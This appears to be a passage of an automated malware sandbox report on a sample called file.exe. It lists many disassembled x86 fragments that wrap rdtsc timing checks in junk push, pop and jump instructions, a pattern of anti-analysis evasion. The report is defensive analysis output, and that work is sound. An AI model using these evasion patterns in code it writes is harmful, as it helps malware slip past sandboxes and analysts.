              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB68C second address: 6BB6B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FCE88BA0318h 0x0000000e jmp 00007FCE88BA030Ch 0x00000013 jng 00007FCE88BA0306h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FCE88BA0306h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB6B4 second address: 6BB6BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E5F7 second address: 72E5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E5FD second address: 72E603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E603 second address: 72E620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0314h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E620 second address: 72E624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72EFEC second address: 72F011 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCE88BA0306h 0x00000008 jmp 00007FCE88BA0317h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F1B5 second address: 72F1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F462 second address: 72F469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5B6 second address: 72F5BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5BC second address: 72F5C8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5C8 second address: 72F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE23h 0x00000007 js 00007FCE887ECE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F5E5 second address: 72F5F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88BA030Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F759 second address: 72F75D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F75D second address: 72F763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706D96 second address: 706DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE887ECE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E52 second address: 706E7F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 je 00007FCE88BA0308h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FCE88BA0315h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E7F second address: 706E89 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCE887ECE1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706E89 second address: 706EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCE88BA0311h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EA5 second address: 706EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EB6 second address: 706EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706EBC second address: 706F15 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCE887ECE29h 0x00000008 jmp 00007FCE887ECE23h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 push esi 0x00000011 sub dword ptr [ebp+1247BD50h], eax 0x00000017 pop edi 0x00000018 call 00007FCE887ECE19h 0x0000001d jnp 00007FCE887ECE1Eh 0x00000023 jc 00007FCE887ECE18h 0x00000029 push eax 0x0000002a jmp 00007FCE887ECE22h 0x0000002f mov eax, dword ptr [esp+04h] 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F15 second address: 706F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F1A second address: 706F32 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCE887ECE1Ch 0x00000008 jbe 00007FCE887ECE16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop ecx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F32 second address: 706F37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 706F37 second address: 706F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7071A8 second address: 7071AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7076D4 second address: 7076D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A95 second address: 707AFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCE88BA0308h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov dh, 98h 0x00000027 stc 0x00000028 lea eax, dword ptr [ebp+1248A50Ah] 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FCE88BA0308h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 adc cx, 53E1h 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707AFC second address: 707B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707B00 second address: 707B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707B18 second address: 707B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A48 second address: 733A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A4C second address: 733A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A61 second address: 733A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A66 second address: 733A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FCE8904C1B6h 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FCE8904C1BFh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733D70 second address: 733D75 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734065 second address: 73406F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73406F second address: 734077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734077 second address: 7340BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FCE8904C1B6h 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FCE8904C1C9h 0x00000017 popad 0x00000018 pushad 0x00000019 jmp 00007FCE8904C1C0h 0x0000001e js 00007FCE8904C1B6h 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73421E second address: 734228 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734228 second address: 734233 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7343AE second address: 7343C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FCE88B69066h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7343C1 second address: 7343C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7343C5 second address: 7343D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FCE88B69066h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7343D6 second address: 7343EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCE8904C1BBh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7343EB second address: 734404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE88B69073h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734404 second address: 734408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F67 second address: 737F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F6D second address: 737F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F71 second address: 737F85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69070h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F85 second address: 737F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737F92 second address: 737F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C2BA second address: 73C2EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FCE8904C1B6h 0x0000000a popad 0x0000000b je 00007FCE8904C1CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007FCE8904C1B6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C458 second address: 73C45C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C45C second address: 73C471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FCE8904C1BAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop esi 0x00000011 pushad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C5E1 second address: 73C5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C846 second address: 73C86F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FCE8904C1D1h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C86F second address: 73C88A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCE88B69071h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73C88A second address: 73C88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CDF7 second address: 73CE03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CE03 second address: 73CE07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D22E second address: 73D247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCE88B69066h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCE88B6906Ch 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7417EC second address: 7417F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FCE8904C1B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7417F7 second address: 7417FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7417FD second address: 741805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741AE6 second address: 741B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCE88B6906Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FCE88B69075h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741B0B second address: 741B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE8904C1C9h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741B2B second address: 741B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FCE88B6906Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741F1D second address: 741F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FCE8904C1C8h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7421FA second address: 74220E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88B69070h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742342 second address: 742346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742346 second address: 742350 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 742350 second address: 74236F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCE8904C1C2h 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b je 00007FCE8904C1B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7459EF second address: 745A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE88B69070h 0x00000008 jbe 00007FCE88B69066h 0x0000000e jmp 00007FCE88B69070h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A21 second address: 745A42 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCE8904C1B6h 0x00000008 jnp 00007FCE8904C1B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCE8904C1BFh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A42 second address: 745A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 745A5C second address: 745A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE8904C1C1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747073 second address: 74709D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69074h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a js 00007FCE88B69066h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FCE88B69066h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749AAD second address: 749ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1BAh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BDDB second address: 74BE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007FCE88B6906Ch 0x0000000c pop ecx 0x0000000d jbe 00007FCE88B69070h 0x00000013 jmp 00007FCE88B6906Ah 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74BE07 second address: 74BE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FCE8904C1B8h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7EC4 second address: 6B7EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7EC8 second address: 6B7ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7ECC second address: 6B7ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7ED4 second address: 6B7EEB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCE8904C1B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jl 00007FCE8904C1B6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7EEB second address: 6B7F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCE88B69078h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCE88B6906Ch 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7F19 second address: 6B7F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753E07 second address: 753E0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753E0D second address: 753E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7528DB second address: 7528EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69070h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752A6B second address: 752A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FCE8904C1B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752A78 second address: 752A8A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCE88B6906Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752D41 second address: 752D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
